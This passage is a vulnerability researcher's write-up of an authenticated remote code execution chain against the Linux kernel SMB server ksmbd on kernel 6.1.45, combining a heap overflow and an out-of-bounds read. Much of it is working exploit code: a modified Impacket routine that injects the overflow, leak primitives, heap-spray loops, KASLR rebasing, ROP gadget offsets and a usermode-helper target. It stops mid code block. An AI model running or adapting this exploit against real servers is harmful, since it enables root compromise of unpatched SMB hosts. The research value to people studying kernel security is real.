What would a vulnerability researcher's magnum opus be? For me, it would be a 0-click 0-day exploit chain against a popular platform or device in the modern era. No interaction needed, system pwned.
Unfortunately, this is a difficult task to achieve these days. So towards the end of my post-grad summer, I decided to practice designing a stable (> 95% success rate) authenticated 0-click exploit from real-world CVEs. As you likely guessed from the title, we are targeting ksmbd, or Kernel SMB3 Daemon. Yes, you heard that right, Linux has a kernelspace SMB3 server because userspace just isn’t enough. Thank you, Microsoft!
[Figure: The beginning of many remote bugs...]
Here is a demo of my end-to-end exploit (at a 2x speedup)!
Onto the writeup now.
ksmbd makes sense as a target for a multitude of reasons.
- It is reachable over the network
- It has a ton of vulnerabilities, including a 0-click RCE exploit from Guillaume Teissier and Quentin Minster of Thalium (end of 2022)
- Many of these vulnerabilities are not hard to reach and are quite surprising to appear in such abundance in the modern era
- There has been existing research on attacking ksmbd: the aforementioned 0-click has a whole online video, which I highly recommend watching. I myself found an unauthenticated remote DoS back in 2023 with Hrvoje Misetic, and there are a multitude of other posts discussing vulnerabilities, from pwning.tech to Doyensec
- ZDI also has a nice collection of advisories for the vulnerabilities as well that gave me a quick overview of each CVE’s exploit implications
- There may be a lot of existing work on discussing vulnerabilities, but there is only one major presentation as I mentioned earlier... where is the fun in vulnerability research if you don’t write exploits?
I would have to say the only “downside” from a coolness factor is that ksmbd is rarely deployed in production. To every sysadmin out there, keep it this way for your own sake.
Choosing the Bugs
I perused the ZDI 2024 advisories and decided upon two CVEs. Network RCE exploits generally require multiple bugs, and each bug has to provide a very useful primitive, since we no longer have the ability to locally manipulate the internal kernel state through syscalls. They remind me in a way of the notorious heap note challenges from CTFs.
My target was 6.1.45, a 2 year out-of-date version, running on a single x86_64 core with all the available standard mitigations (SMAP, SMEP, KPTI, KASLR, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, etc.). I really hope no one is running this version with ksmbd enabled and exposed…
ZDI-24-229 (CVE-2023-52440) was the first: ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob(). This bug was discovered by Pumpkin of DEVCORE. Let us take a look at the patch:
     int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
     	if (blob_len < (u64)sess_key_off + sess_key_len)
     		return -EINVAL;

    +	if (sess_key_len > CIFS_KEY_SIZE)
    +		return -EINVAL;
    +
     	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
     	if (!ctx_arc4)
     		return -ENOMEM;
This vulnerable snippet can be triggered during NTLM authentication through a SMB2_SESSION_SETUP message. Since sess_key_len is user controlled, we can cause an overflow of the fixed size sess_key buffer when executing cifs_arc4_crypt. This is actually quite an easy bug to trigger and gives us a controlled SLUB overflow.
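To make the effect of the patch concrete, here is a small Python model of the two length checks. It is only a sketch of the logic shown in the diff, not kernel code: the function name is made up for illustration, and CIFS_KEY_SIZE is assumed to be 40 (the size of the fixed sess_key buffer).

```python
# Assumed value of the kernel constant; treat it as an assumption of this sketch.
CIFS_KEY_SIZE = 40


def auth_blob_lengths_ok(blob_len, sess_key_off, sess_key_len, patched=True):
    """Model the length validation around the session key copy.

    The first check exists before and after the patch: the key must lie
    inside the received blob. The second check is the one the patch adds:
    the key must also fit into the fixed-size destination buffer.
    """
    if blob_len < sess_key_off + sess_key_len:
        return False
    if patched and sess_key_len > CIFS_KEY_SIZE:
        return False
    return True


# A 0x200-byte "key" that fits inside the blob passes the old validation...
print(auth_blob_lengths_ok(0x400, 0x100, 0x200, patched=False))
# ...and is rejected once the destination size is checked as well.
print(auth_blob_lengths_ok(0x400, 0x100, 0x200, patched=True))
```

The point of the model is that the pre-patch code only bounded the source of the copy, never the destination.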
In Impacket (commit 7561038277f4b08a16f37aac886cfe0193e75434), you can trigger this bug by just modifying a single line in getNTLMSSPType3 in ntlm.py. You can set session_key in ntlmChallengeResponse to a blob of any length, and you can achieve a controlled SLUB overflow by running cifs_arc4_crypt on the target payload with sessionBaseKey as the context.
        if version is not None:
            ntlmChallengeResponse['Version'] = version
        ntlmChallengeResponse['ntlm'] = ntResponse
        if encryptedRandomSessionKey is not None:
            if os.getenv('IMPACKET_OVERFLOW_NTLM'):
                print('making evil session_key')
                ctx = ARC4Ctx()
                cifs_arc4_setkey(ctx, sessionBaseKey, len(sessionBaseKey))
                data = base64.b64decode(os.getenv('IMPACKET_OVERFLOW_NTLM'))
                ntlmChallengeResponse['session_key'] = cifs_arc4_crypt(ctx, data)
            else:
                ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey
        return ntlmChallengeResponse, exportedSessionKey
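The reason the payload is run through the cipher on the client side is that RC4 is symmetric: applying the same keystream twice returns the original bytes. Assuming the receiver decrypts the session key field with the same key, pre-encrypting the data means the decrypted output is exactly what the sender chose. The following is a textbook RC4 in plain Python that demonstrates the property; it is a standalone sketch, not the cifs_arc4 port used in the modified Impacket.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]

    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


key = b"Key"
wanted = b"bytes the receiver should end up with"
wire = rc4(key, wanted)            # what the sender puts on the wire
assert rc4(key, wire) == wanted    # what the receiver recovers after decrypting
```

Because encryption and decryption are the same operation, no separate "decrypt" routine is needed on either side.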
Honestly, this is an awesome primitive: unauthenticated remote controlled heap overflow of content and size. Based on the Thalium primitive, this is the equivalent of their “writeheap” primitive. We are restricted to kmalloc-512 with the bug here.
Now, we need to find a leakage vector. This vector is actually what downgraded our 0-click from an “unauthenticated” one to an “authenticated” one, just like the Thalium 0-click. We require a primitive that leaks contents back through the response buffers. I decided on ZDI-24-587, which is an authenticated remote leak bug. Pumpkin discovered this yet again and it is assigned CVE-2023-4130. Let us take a look at the commit, which is titled ksmbd: fix wrong next length validation of ea buffer in smb2_set_ea().
    diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
    index 9849d748934599..7cc1b0c47d0a20 100644
    --- a/fs/smb/server/smb2pdu.c
    +++ b/fs/smb/server/smb2pdu.c
     next:
     			break;
     		buf_len -= next;
     		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
    -		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
    +		if (buf_len < sizeof(struct smb2_ea_info)) {
    +			rc = -EINVAL;
     			break;
    +		}
    +		if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
    +				le16_to_cpu(eabuf->EaValueLength)) {
    +			rc = -EINVAL;
    +		}
     	} while (next != 0);

     	kfree(attr_name);
Given write access to the SMB share filesystem, a user can write extended attributes onto files, which Linux emulates through xattr in the vfs layer. Utilizing this feature in Impacket requires us to use the setInfo function on SMB3 objects with infoType set as SMB2_0_INFO_FILE and fileInfoClass set as SMB2_FULL_EA_INFO.
Looking at the original vulnerable code:
    do {
    	if (!eabuf->EaNameLength)
    		goto next;

    	ksmbd_debug(SMB,
    		    "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
    		    eabuf->name, eabuf->EaNameLength,
    		    le16_to_cpu(eabuf->EaValueLength),
    		    le32_to_cpu(eabuf->NextEntryOffset));

    	if (eabuf->EaNameLength >
    	    (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
    		rc = -EINVAL;
    		break;
    	}

    	memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
    	memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
    	       eabuf->EaNameLength);
    	attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
    	value = (char *)&eabuf->name + eabuf->EaNameLength + 1;

    	if (!eabuf->EaValueLength) {
    		rc = ksmbd_vfs_casexattr_len(user_ns,
    					     path->dentry,
    					     attr_name,
    					     XATTR_USER_PREFIX_LEN +
    					     eabuf->EaNameLength);

    		/* delete the EA only when it exits */
    		if (rc > 0) {
    			rc = ksmbd_vfs_remove_xattr(user_ns,
    						    path->dentry,
    						    attr_name);

    			if (rc < 0) {
    				ksmbd_debug(SMB,
    					    "remove xattr failed(%d)\n",
    					    rc);
    				break;
    			}
    		}

    		/* if the EA doesn't exist, just do nothing. */
    		rc = 0;
    	} else {
    		rc = ksmbd_vfs_setxattr(user_ns,
    					path->dentry, attr_name, value,
    					le16_to_cpu(eabuf->EaValueLength), 0);
    		if (rc < 0) {
    			ksmbd_debug(SMB,
    				    "ksmbd_vfs_setxattr is failed(%d)\n",
    				    rc);
    			break;
    		}
    	}

    next:
    	next = le32_to_cpu(eabuf->NextEntryOffset);
    	if (next == 0 || buf_len < next)
    		break;
    	buf_len -= next;
    	eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
    	if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
    		break;

    } while (next != 0);
And the original struct:
    struct smb2_ea_info {
    	__le32 NextEntryOffset;
    	__u8   Flags;
    	__u8   EaNameLength;
    	__le16 EaValueLength;
    	char name[1];
    	/* optionally followed by value */
    } __packed; /* level 15 Query */
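For readers who prefer to see the layout from the parsing side, here is a minimal Python sketch of how one such entry decodes: an 8-byte packed little-endian header, then the name, a NUL byte, and the value. The helper and type names are hypothetical, and unlike the vulnerable loop this parser refuses entries whose declared lengths run past the buffer.

```python
import struct
from typing import NamedTuple

# NextEntryOffset (u32), Flags (u8), EaNameLength (u8), EaValueLength (u16)
EA_HEADER = struct.Struct("<IBBH")


class EaEntry(NamedTuple):
    next_entry_offset: int
    flags: int
    name: bytes
    value: bytes


def parse_ea_entry(buf: bytes, off: int = 0) -> EaEntry:
    """Decode one entry at `off`, validating every length against the buffer."""
    if len(buf) - off < EA_HEADER.size:
        raise ValueError("truncated header")
    next_off, flags, name_len, value_len = EA_HEADER.unpack_from(buf, off)
    name_start = off + EA_HEADER.size
    value_start = name_start + name_len + 1  # the value follows the name's NUL
    if value_start + value_len > len(buf):
        raise ValueError("entry exceeds buffer")
    return EaEntry(next_off, flags,
                   buf[name_start:name_start + name_len],
                   buf[value_start:value_start + value_len])


raw = EA_HEADER.pack(0, 0, 4, 5) + b"user\x00" + b"hello"
entry = parse_ea_entry(raw)
print(entry.name, entry.value)
```

The second length check is the important one: the value length is taken from attacker-supplied bytes, so it has to be compared against what was actually received.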
We can see that in the next block, we can trick ksmbd into thinking there are additional smb2_ea_info entries by setting NextEntryOffset to a malicious value, as long as we do not exceed our buffer bounds. However, we can still type-confuse this fake next smb2_ea_info with our controlled data in the current name field to provide us with an evil EaValueLength. This will allow the subsequent ksmbd_vfs_setxattr to store OOB read data of adjacent heap chunks into xattr, which we can fetch with SMB3.queryInfo using the same fileInfoClass. The only limitation is that our leak is somewhat limited due to this nonsensical check, which I am pretty sure is a mistake given the context. It requires the sum of our type-confused EaNameLength and EaValueLength to be under the next value. Regardless, we can still achieve some substantial leaks from this. This is the equivalent of the “writeleak” primitive from the Thalium 0-click.
I constructed the following make_evil primitive to construct malicious smb2_ea_info structs for me:
    # will leak -0x10 less
    def make_evil(size):
        assert(size >= 0x20)
        # 12 bytes left till size after this
        evil_ea_name = b'evil.name' + b''.ljust(size - 12 - 9 + 1 - 12, b'A') + b'\x00\x00\x00'
        evil_value_name = p32(0) + p8(0) + p8(3) + p16(size - 0x10) + b'oof\x00'
        evil_entry = FILE_FULL_EA_INFORMATION()
        evil_entry['NextEntryOffset'] = size - 12
        evil_entry['Flags'] = 0
        evil_entry['EaNameLength'] = len(evil_ea_name) - 1
        evil_entry['EaValueLength'] = len(evil_value_name)
        evil_entry['EaName'] = evil_ea_name
        evil_entry['EaValue'] = evil_value_name
        return evil_entry
This structure is inlined with smb request structures (more on this later) in ksmbd, so we construct the name buffer to pad this request allocation to size to leak size - 0x10 bytes. If you look at this carefully, we point NextEntryOffset to the value buffer to type confuse it as another smb2_ea_info structure. The fake EaNameLength and fake EaValueLength are all chosen to pass the nonsensical check.
[Figure: The evil smb2_ea_info object]
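As a worked example of the arithmetic, the pre-patch check can be modelled in a few lines of Python and evaluated with the values make_evil would produce for a kmalloc-512 sized request (0x200 minus the 0x65 byte header mentioned later in this post). The function name is made up; the comparison is copied from the vulnerable loop.

```python
def old_check_passes(next_off: int, name_len: int, value_len: int) -> bool:
    """Pre-patch logic: the loop breaks if next < EaNameLength + EaValueLength."""
    return not (next_off < name_len + value_len)


size = 0x200 - 0x65            # 0x19b, the size handed to make_evil
next_off = size - 12           # NextEntryOffset of the real entry
fake_name_len = 3              # EaNameLength of the type-confused entry
fake_value_len = size - 0x10   # EaValueLength of the type-confused entry

print(hex(next_off), hex(fake_name_len + fake_value_len))
print(old_check_passes(next_off, fake_name_len, fake_value_len))
```

With these numbers the sum is one below next, so the check is satisfied, and the value length cannot grow much further before the loop bails out, which is the limitation described above.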
Using make_evil, I can construct a leak primitive.
    def leak(leaker, tid, fid, amount):
        # can't arbitrarily leak because of this nonsensical check
        # https://elixir.bootlin.com/linux/v6.1.45/source/fs/smb/server/smb2pdu.c#L2343
        entries = [make_evil(amount-0x65)]
        entries = [e.getData() for e in entries]
        leaker.setInfo(
            tid, fid,
            inputBlob=b''.join(entries),
            infoType=SMB2_0_INFO_FILE,
            fileInfoClass=SMB2_FULL_EA_INFO
        )
        result = leaker.queryInfo(
            tid, fid,
            fileInfoClass=SMB2_FULL_EA_INFO
        )
        _, leak = deserialize_ea(result)
        leak = leak[2:]
        dump_x_gx(leak)
        return leak
While this will leak kernel heap contents, the next controlled allocation almost never lands where this leaky request was allocated, so we cannot use it to reliably predict the exact heap layout.
To summarize, on Linux 6.1.45 (the fix for the leak bug was backported in 6.1.46), we can pwn ksmbd through any user with write access to a share. I consider this an authenticated 0-click since you need user credentials, but I am sure that there is at least one sysadmin out there who allows anonymously writable shares.
Here is the sample ksmbd.conf file I used to simulate a vulnerable system.
    [CompanyShare]
        ; share parameters
        force user = fossboss
        path = /CompanyShare
        read only = no
Kernel slabs are also technically per-CPU so I did most of my development on a single core setup. The approach I present applies to multi-core setups though, at the cost of some speed (and stability issues at the end). For what it's worth, the exploit successfully worked with 2 cores too.
ksmbd Crash Course + Thalium's Strategy
Before continuing onto the exploit, I shall provide an extremely high-level overview of some important ksmbd behaviors, and discuss the changes in exploit strategies since the Thalium 0-click.
The two most important structs in our exploit are ksmbd_conn (kmalloc-1k) and ksmbd_session (kmalloc-512). If you are unfamiliar with the Linux slub allocator, I recommend this presentation. There is a plethora of other structs in this subsystem, but I did not need any of them for the exploit.
ksmbd operates from kernel worker threads. On a new TCP connection, a ksmbd_conn object is allocated through kzalloc and the kernel calls ksmbd_conn_handler_loop in a new thread. The request buffer has a dynamic size and is allocated in this function. This is useful because smb2_ea_info is allocated inline in this request, providing us with a dynamic heap allocation primitive. Sadly, the request is freed right after handling.
From my debugging, the initial header before the first smb2_ea_info struct took up 0x65 bytes. Note that by using this primitive in kmalloc-1k to leak adjacent ksmbd_conn contents, we achieve a KASLR bypass, since the object holds pointers into the kernel data section.
Then process_fn from default_conn_ops is called, which subsequently sends the request for processing in a worker thread through ksmbd_server_process_request -> queue_ksmbd_work. Work processing eventually calls __handle_ksmbd_work, which finally dispatches __process_request.
There are many different cmd handlers, such as the one that leads to the OOB read vulnerability. The one we particularly care about is the session setup cmd, which is defined here and creates a ksmbd_session object. This represents a single session in a ksmbd TCP connection, and it is allocated here through kzalloc.
Session setup via NTLM takes place in two parts, as it is a challenge-response protocol. Note that while the session object is allocated during the challenge phase, the SLUB overflow happens in the response part of the protocol, and we can repeatedly re-run that part of the protocol. This will prove extremely useful later on.
Now, let's discuss some changes I observed in ksmbd since the Thalium 0-click.
Because kmalloc-512 is relatively noisy, their exploit relied on something known as compound requests (which was also the source of many ksmbd bugs). This way, multiple sessions could be allocated in one go via a tight loop, with less chance of other interfering allocations. However, when allocating a new session, ksmbd expires other sessions in the connection that have finished authentication, but we wouldn’t be able to do that without first receiving a response due to the challenge-response nature of NTLM.
Another trick in their exploit was tampering with ksmbd_session->id to side-channel out information regarding the results of an overflow (such as which session was affected, etc.). However, at least from my experiments, this is no longer possible since there seems to be a per-connection xarray and a global hash table for tracking sessions.
Thalium also had an awesome heap spray primitive that no longer exists. The idea was to hang the TCP read attempt of the whole request in ksmbd_tcp_readv. Unfortunately, ksmbd limits data reception to 2 attempts now with very short timeout intervals.
Their last trick, which is still applicable today, was for RIP control. They overflowed the nls_table pointer in the ksmbd_session object to redirect it to a forged object with a malicious vtable. Then, during the NTLM response phase (which we can repeatedly run), the following call chain happens: ntlm_authenticate -> session_user -> smb_strndup_from_utf16 -> smb_utf16_bytes, which uses a function pointer to fetch character lengths. However, this pointer now exists in kmalloc-1k as part of ksmbd_conn, so we will need to find a way to transform our memory corruption primitive in kmalloc-512 to affect kmalloc-1k. I did not look for some other target in kmalloc-512, but I'm sure one exists.
Ok, now let’s get to pwning ksmbd.
Our New Strategy
Let’s first analyze how we can spray. For each connection, we can allocate a ksmbd_conn and a ksmbd_session object. How many can we have at once? How long can each connection last?
The answers to those questions are determined by the server_conf module global. max_connections determines the active connection limit, and deadtime determines the timeout. By default, the values were 0x80 and 0x0, respectively, with 0 for the latter representing infinite time. The maximum connection count is good for us because kmalloc-512 and kmalloc-1k only have 16 elements per slab, making it easier to massage the heap with freelist randomization.
However, as I discovered later in the exploit, not only is kmalloc-512 busy, kmalloc-1k is also an active slab, especially due to tcp replies from ksmbd! I have found the kernel kmem trace framework extremely useful for debugging heap noise and highly recommend others try it out (I have used this to debug cross cache attacks in my other recent exploits). Anyways, this was a backtrace I repeatedly saw that was causing activity in kmalloc-1k:
    kworker/0:4-302     [000] .....    94.399734: kmalloc: call_site=tcp_stream_alloc_skb+0x28/0x130 ptr=ffff888102d32000 bytes_req=1024 bytes_alloc=1024 gfp_flags= node=-1 accounted=false
    kworker/0:4-302     [000] .....    94.399741: <stack trace>
     => trace_event_raw_event_kmalloc
     => __kmalloc_node_track_caller
     => __alloc_skb
     => tcp_stream_alloc_skb
     => tcp_sendmsg_locked
     => tcp_sendmsg
     => sock_sendmsg
     => ksmbd_tcp_writev
     => ksmbd_conn_write
     => handle_ksmbd_work
     => process_one_work
     => worker_thread
     => kthread
Luckily, this chunk is often freed after e1000 processing, before other kmalloc-1k allocations.
    <idle>-0       [000] ..s2.    94.402376: kfree: call_site=skb_release_data+0x139/0x180 ptr=ffff888102d32000
    <idle>-0       [000] ..s2.    94.402395: <stack trace>
     => trace_event_raw_event_kfree
     => kfree
     => skb_release_data
     => __kfree_skb
     => tcp_ack
     => tcp_rcv_established
     => tcp_v4_do_rcv
     => tcp_v4_rcv
     => ip_protocol_deliver_rcu
     => ip_local_deliver_finish
     => ip_sublist_rcv_finish
     => ip_sublist_rcv
     => ip_list_rcv
     => __netif_receive_skb_list_core
     => netif_receive_skb_list_internal
     => napi_complete_done
     => e1000_clean
Generally, these ephemeral allocations didn’t cause too much of an issue during a short window, but I did encounter a lot more instability when expecting the heap state to remain the same over a longer period of time. This means we have to be very precise with the sessions we choose to utilize for triggering primitives in our exploit, rather than blindly gunning for a homerun with a large spray.
Remember from earlier that our overflow is in kmalloc-512, but our target pointer to corrupt for vtable hijacking is in kmalloc-1k? We can rely on the overflow bug to overwrite one of the many pointers that ksmbd_session frees in order to trigger an arbitrary free primitive onto kmalloc-1k. In fact, one such pointer is the Preauth_HashValue field, which can be freed in the response phase of session setup. There aren’t checks against misaligned frees from the allocator, so we can now allocate an object with our controlled data to overlap with an existing ksmbd_conn object to overwrite the local_nls field.
[Figure: Pivoting from kmalloc-512 overflow to kmalloc-1k overwrite]
This overflow into ksmbd_session poses some problems, though. When overflowing into the adjacent ksmbd_session struct, many of the fields afterwards are overwritten. We must keep this connection alive to avoid a crash in ksmbd_session_destroy. For example, id actually poses a major issue. An incorrect value here leads to a double free, which the allocator catches, so we must also identify this session and keep it alive. I did not look too far into why this is the case, though I assume it has to do with the fact that sessions are tracked in separate structures and an id mismatch causes some sort of desynchronization.
[Figure: Overflow and corruption of ksmbd_session object]
Exploit Development
The first goal would be to leak the contents of a ksmbd_session to help us keep the overflowed ksmbd_session in a “valid” state during our operations (aside from disconnection). I first created a leaker connection to achieve this.
    def conn():
        return SMBConnection(ADDRESS, TARGET_IP, sess_port=PORT, preferredDialect=SMB2_DIALECT_311, timeout=30000)

    def open_file(conn, tid):
        return conn.create(
            tid, FILENAME,
            desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | FILE_READ_EA | FILE_WRITE_EA,
            shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE,
            creationOptions=FILE_NON_DIRECTORY_FILE,
            creationDisposition=FILE_OVERWRITE_IF,
            fileAttributes=FILE_ATTRIBUTE_NORMAL
        )

    leaker = conn()
    leaker.login(USER, PW, DOMAIN)
    leaker = leaker._SMBConnection
    assert leaker.getDialect() == SMB2_DIALECT_311
Then, we spam a bunch of ksmbd_session objects left in the first stage of the session request. Normally, Impacket completes the challenge and response in one function, but I broke login apart into login_init and login_finish.
We can identify valid session objects and track the owning connection through the ClientGUID field. By default, Impacket uses a random string, but I added a fixed string component of 10 C’s for identification purposes. Now, we can repeatedly allocate connections, attempt a leak, and check for a live connection’s GUID. If none exist, we close all the currently sprayed connections and try again. This spray, check, free loop is a common pattern in this exploit and makes it very reliable.
    spray1 = 0x18
    spray2 = spray1 + 0x10
    spray3 = spray2 + 0x18
    spray4 = spray3 + 0x18
    conns = [None for i in range(spray4)]
    kmalloc512_leak = None
    kmalloc512_leak_q = None
    kmalloc1k_leak = None
    kmalloc1k_leak_q = None
    target_conn = None

    tid = leaker.connectTree(SHARE)
    fid = open_file(leaker, tid)

    while True:
        for i in range(spray1):
            log.info(f"spraying conn {i}")
            # struct ksmbd_conn alloc
            conns[i] = conn()
            # struct ksmbd_session alloc
            conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)
        # spray and retry, because of slab noise and slab randomization
        # a bigger kmalloc-1024?, then kmalloc-512, potentially a few other allocs
        log.info('leakage of kmalloc-512')
        kmalloc512_leak = leak(leaker, tid, fid, 0x200)
        kmalloc512_leak_q = extract_qwords(kmalloc512_leak)
        if kmalloc512_leak_q[2] != 0x4343434343434343:
            log.info('leak failed, trying again')
            for i in range(spray1):
                conns[i]._SMBConnection.close_session()
            fid = open_file(leaker, tid)
        else:
            break
0x10 - 0x18 makes sense for a spray parameter due to the fact that both kmalloc-512 and kmalloc-1k only hold 16 items each.
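The exploit snippets index leaked data as 64-bit words through an extract_qwords helper whose body is not shown in this post. A plausible minimal version, offered here only as an assumption about what it does, splits the buffer into little-endian unsigned qwords and ignores any trailing partial word:

```python
import struct


def extract_qwords(data: bytes) -> list[int]:
    """Split `data` into little-endian u64 values, dropping a trailing partial qword."""
    usable = len(data) - (len(data) % 8)
    return [q for (q,) in struct.iter_unpack("<Q", data[:usable])]


# Eight 'C' bytes decode to the marker value the spray loop compares against.
sample = b"C" * 8 + (1).to_bytes(8, "little") + b"xx"
print([hex(q) for q in extract_qwords(sample)])
```

This makes a comparison such as `q[2] != 0x4343434343434343` a check for eight consecutive 'C' bytes at byte offset 0x10 of the leak.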
After leaking a valid ksmbd_session, I reuse the data for the SLUB overflow portion of the exploit. My goal here is not to perform the arbitrary free next, but to identify the overflowed connection (labeled as overflowed_conn in the exploit). This way, I can pinpoint the exact victim connection to narrow the window between freeing and reclaiming with a ksmbd request. The leaked data won't cleanly preserve an overflowed session, but it is enough for it to survive the next step.
While the session id can no longer act as an oracle, corrupting the session state for a subsequent operation that is not echo, negotiation or session setup can act as a substitute. The relevant call chain starts from here, which calls ksmbd_session_lookup_all and makes this check.
If we finish session setup on all of the sprayed sessions, and subsequently overflow a connection, we can then attempt a share connect for all of the sprayed sessions. The failed one will respond with an error. We can also repeat this in a loop until an overflow actually happens. The session object from which the overflow happens must remain alive, but we have at least 0x20 chances for this to occur. I have not observed more than 5-6 attempts for a successful overflow as the slab has few objects.
    overflowed_conn = None
    failed_evils = []
    while True:
        evil = conn()
        for i in range(spray1, spray2):
            log.info(f"spraying conn {i}")
            conns[i] = conn()
            conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)
        log.info(f"allocate evil")
        # ksmbd_session allocate
        evil._SMBConnection.login_init(USER, PW, DOMAIN)
        for i in range(spray2, spray3):
            log.info(f"spraying conn {i}")
            conns[i] = conn()
            conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)
        for i in range(spray1, spray3):
            conns[i]._SMBConnection.login_finish()
        # set a potential state as in progress to see if any error
        payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') +
                   kmalloc512_leak[:0x34]) + p32(1)
        os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode()
        # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff
        evil._SMBConnection.login_finish()
        os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)
        for i in range(spray1, spray3):
            try:
                log.info(f'attempting tree connect on {i}')
                conns[i]._SMBConnection.connectTree(SHARE)
            except impacket.smb3.SessionError:
                overflowed_conn = i
                log.info(f'overflowed connection: {overflowed_conn}')
                break
        if overflowed_conn is None:
            # note that we are limited in total attempts in this
            # but we should be able to hit in a few tries at most
            log.info('overflow failed, retrying')
            for i in range(spray1, spray3):
                conns[i]._SMBConnection.close_session()
            failed_evils.append(evil)
        else:
            break
Once we have achieved an overflow against an exploitable heap layout, we can repeat the overflow from the evil session onto the overflowed_conn session to reliably help trigger an arbitrary free.
Next, we would need a heap leak to find a ksmbd_conn object as well as a KASLR leak. The ksmbd_conn object provides both. The srv_mutex field has a linked list that points to itself. There are multiple pointers to kernel data at the start of the object. We can repeat the same strategy as earlier but with an evil smb2_ea_info in kmalloc-1k: we identify whether we have leaked an active connection through the GUID field, and try again otherwise.
    while True:
        for i in range(spray3, spray4):
            log.info(f"spraying conn {i}")
            conns[i] = conn()
            conns[i]._SMBConnection.login_init(USER, PW, DOMAIN)
        # a bigger kmalloc-2048?, then kmalloc-1024, potentially a few other allocs
        log.info('leakage of kmalloc-1024')
        kmalloc1k_leak = leak(leaker, tid, fid, 0x400)
        kmalloc1k_leak_q = extract_qwords(kmalloc1k_leak)
        if kmalloc1k_leak_q[0] & 0xffff == 0xdd00:
            guid = (p64(kmalloc1k_leak_q[35]) + p64(kmalloc1k_leak_q[36])).decode()
            print(f'guid is: {guid}')
            for i in range(spray4):
                if guid == conns[i]._SMBConnection.ClientGuid:
                    target_conn = i
                    log.info(f'found target conn based on guid at {target_conn}')
            if target_conn != None:
                break
        log.info('failed, trying again')
        for i in range(spray3, spray4):
            conns[i]._SMBConnection.close_session()
        fid = open_file(leaker, tid)
With this pointer leaked, we can arbitrarily free a misaligned chunk (named target) above the leaked ksmbd_conn object to prepare for an overwrite by triggering the response phase of session setup. I calculated the offsets of a few gadgets I used to finish the exploit at this point.
    target = kmalloc1k_leak_q[6] - 0x30 - 0x1c0
    smb311_server_values = kmalloc1k_leak_q[0]
    kaslr_base = smb311_server_values - (0xffffffff82fcdd00 - 0xffffffff81000000)
    rebase = lambda orig_addr : kaslr_base + (orig_addr - 0xffffffff81000000)
    # 0xffffffff810f4533: leave ; ret ;
    leave_ret = rebase(0xffffffff810f4533)
    # 0xffffffff81031157: pop rdi ; ret ;
    pop_rdi = rebase(0xffffffff81031157)
    # 0xffffffff8105c524: pop rsi ; ret ;
    pop_rsi = rebase(0xffffffff8105c524)
    # 0xffffffff810aac72: pop rdx ; ret ;
    pop_rdx = rebase(0xffffffff810aac72)
    # 0xffffffff81245e83: pop rcx ; ret ;
    pop_rcx = rebase(0xffffffff81245e83)
    # 0xffffffff811eaf20: pop rsp ; ret ;
    pop_rsp = rebase(0xffffffff811eaf20)
    '''
    x/50gx 0xffffffff82e5ee00
    0xffffffff82e5ee00 <envp.0>:    0xffffffff827e612a 0xffffffff827e6131
    0xffffffff82e5ee10 <envp.0+16>: 0xffffffff82843918 0x0000000000000000
    '''
    envp = rebase(0xffffffff82e5ee00)
    call_usermodehelper = rebase(0xffffffff810e9e40)
    msleep = rebase(0xffffffff8115ffc0)

    log.info(f'kaslr: {hex(kaslr_base)}')
    log.info(f'stack pivot: {hex(leave_ret)}')
    log.info(f'pop rdi: {hex(pop_rdi)}')
    log.info(f'pop rsi: {hex(pop_rsi)}')
    log.info(f'pop rdx: {hex(pop_rdx)}')
    log.info(f'pop rcx: {hex(pop_rcx)}')
    log.info(f'pop_rsp: {hex(pop_rsp)}')
    log.info(f'envp: {hex(envp)}')
    log.info(f'call_usermodehelper: {hex(call_usermodehelper)}')
    log.info(f'msleep: {hex(msleep)}')
    log.info(f'choosing our target: {hex(target)}')

    payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') +
               p64(0xbaad) + p16(0x311) + b'X' * 16 + kmalloc512_leak[0x8+18:0x38] + p64(target))
    os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode()
    # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff
    evil._SMBConnection.login_finish()
    os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)
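The rebasing arithmetic is easier to follow with concrete numbers. The sketch below uses the same two static addresses as the snippet above, while the leaked pointer value is invented purely for illustration. It also shows why checking the low 16 bits of the leak works as a filter: on x86_64 the KASLR slide is typically a multiple of 2 MiB (an assumption about the default alignment), so the low bits of a kernel data pointer survive randomization.

```python
STATIC_BASE = 0xffffffff81000000    # kernel text base without KASLR
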